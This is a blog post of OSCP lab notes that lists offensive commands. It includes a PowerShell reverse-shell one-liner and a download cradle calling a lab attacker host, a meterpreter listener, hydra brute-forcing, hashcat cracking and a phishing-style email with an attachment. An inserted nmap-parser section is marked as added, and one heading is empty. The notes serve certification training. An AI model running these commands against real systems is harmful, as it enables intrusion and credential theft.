OSCP Survival Notes

Hadi AL Halbouni
3 min read · Aug 5, 2023

This is a list of useful commands and notes for the OSCP.
I will keep updating it as I progress through the PEN-200 course
content and while I am hacking machines on HTB or THM.
Notes on Active Directory, tunneling, and port forwarding are coming soon.

Useful Linux Commands & Tricks:

Assigning an IP address to an environment variable:

An environment variable can be defined with the export command. For example, if we are scanning a target and don’t want to type in the system’s IP address repeatedly, we can quickly assign it to an environment variable and use that instead:

kali@kali:~$ export b=10.11.1.220

kali@kali:~$ ping -c 2 $b
PING 10.11.1.220 (10.11.1.220) 56(84) bytes of data.
64 bytes from 10.11.1.220: icmp_seq=1 ttl=62 time=2.23 ms
64 bytes from 10.11.1.220: icmp_seq=2 ttl=62 time=1.56 ms

Reuse a command from shell history without re-typing the whole command:

kali@kali:~$ history
1 cat /etc/lsb-release
2 clear
3 history

Rather than re-typing a long command from our history, we can make use of the history expansion facility. For example, looking back at the history output above, there are three commands in our history, each preceded by a line number. To re-run the first command, we simply type the ! character followed by the line number, in this case 1, to execute the cat /etc/lsb-release command:

kali@kali:~$ !1
cat /etc/lsb-release
DISTRIB_ID=Kali
DISTRIB_RELEASE=kali-rolling
DISTRIB_CODENAME=kali-rolling
DISTRIB_DESCRIPTION="Kali GNU/Linux Rolling"

PowerShell:

Downloading files with PowerShell:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
wget.exe -V

Reverse shell with PowerShell:

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Service enumeration:

Scanning for the NetBIOS & SMB Services:

With Nmap

nmap -v -p 139,445 -oG smb.txt <ip>
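The -oG flag writes nmap's greppable format, one tab-separated "Key: value" line per host. As an added example (not from the original post), here is a small parser for that file so the hosts that actually expose SMB can be pulled out of smb.txt without grepping by hand; the sample output below is constructed and the hosts in it are made up:

```python
import sys
from typing import Dict, List

# Constructed sample of "nmap -v -p 139,445 -oG smb.txt <ip>" output.
# Banner/footer lines start with "#"; host lines are tab-separated fields.
SAMPLE_OG = """\
# Nmap 7.94 scan initiated Sat Aug  5 10:00:00 2023 as: nmap -v -p 139,445 -oG smb.txt 10.11.1.0/24
Host: 10.11.1.5 ()\tStatus: Up
Host: 10.11.1.5 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///
Host: 10.11.1.7 ()\tStatus: Up
Host: 10.11.1.7 ()\tPorts: 139/closed/tcp//netbios-ssn///, 445/filtered/tcp//microsoft-ds///
Host: 10.11.1.9 (fileserver.lab)\tStatus: Up
Host: 10.11.1.9 (fileserver.lab)\tPorts: 139/open/tcp//netbios-ssn///, 445/closed/tcp//microsoft-ds///
# Nmap done at Sat Aug  5 10:00:03 2023 -- 256 IP addresses (3 hosts up) scanned in 2.51 seconds
"""


def parse_grepable(text: str) -> Dict[str, Dict[int, str]]:
    """Map each host IP to {tcp_port: state} from nmap -oG output.

    The "Ports:" field holds comma-separated entries of the form
    port/state/proto/owner/service/rpc/version/ .
    """
    hosts: Dict[str, Dict[int, str]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # skip the "# Nmap ..." banner and footer
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        ip = fields["Host"].split(" ", 1)[0]  # drop the "(hostname)" part
        states = hosts.setdefault(ip, {})
        for entry in fields.get("Ports", "").split(", "):
            if not entry:
                continue  # "Status: Up" lines carry no Ports field
            port, state, proto = entry.split("/")[:3]
            if proto == "tcp":
                states[int(port)] = state
    return hosts


def hosts_with_open(hosts: Dict[str, Dict[int, str]], port: int) -> List[str]:
    """Return the IPs on which the given TCP port is reported open."""
    return sorted(ip for ip, states in hosts.items() if states.get(port) == "open")


if __name__ == "__main__":
    # Pass smb.txt as the first argument; otherwise the constructed sample is parsed.
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_OG
    for ip in hosts_with_open(parse_grepable(data), 445):
        print(ip)
```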

With nbtscan

nbtscan is a specialized tool for identifying NetBIOS information. The -r option sets the originating UDP port to 137, the port used to query the NetBIOS name service for valid NetBIOS names:

sudo nbtscan -r 10.11.1.0/24

SQL injection:

SQLite3:

Sharing a Linux folder with a Windows host over xfreerdp:

xfreerdp /v:<Target_Windows_IP> /u:offsec /p:lab /drive:<share_name>,<path_You_Want_To_Share_On_Linux>

The Linux directory then appears inside the RDP session as \\tsclient\<share_name>, so a file such as C:\Users\offsec\Desktop\ticket.doc can be copied into it from the Windows side:

xfreerdp /v:192.168.240.196 /u:offsec /p:lab /drive:share,/home/kali/Desktop

Sending email with Swaks:

swaks --server <server_IP> --port <Port_Number> --auth-user <your_user_on_the_server> --from <your_user_email> --to <Recipient_email> --attach @<The_attachment>

swaks --server 192.168.191.199 --port 587 --auth-user test@supermagicorg.com --from test@supermagicorg.com --to dave.wizard@supermagicorg.com --attach @config.library-ms

Scanning for SMB vulnerabilities with Nmap if port 445 is open:

nmap --script "smb-vuln*" -p 445 <Target_IP>

Setting up a Meterpreter listener:

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <LHOST_IP>;set LPORT 4444;run;"

HTTP Basic Auth attack with hydra

sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.225.201 http-get "/"

Good reference
http://tylerrockwell.github.io/defeating-basic-auth-with-hydra/

Cracking an MD5 hash with hashcat using rules:

hashcat -m 0 <file_containing_hash> <path_To_wordlist> -r <rule_file> --force

hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force


Written by Hadi AL Halbouni

Cybersecurity Analyst with a B.Sc in Software Engineering and 2 M.Sc degrees in Cybersecurity. Skilled in detection, response and passionate about red teaming
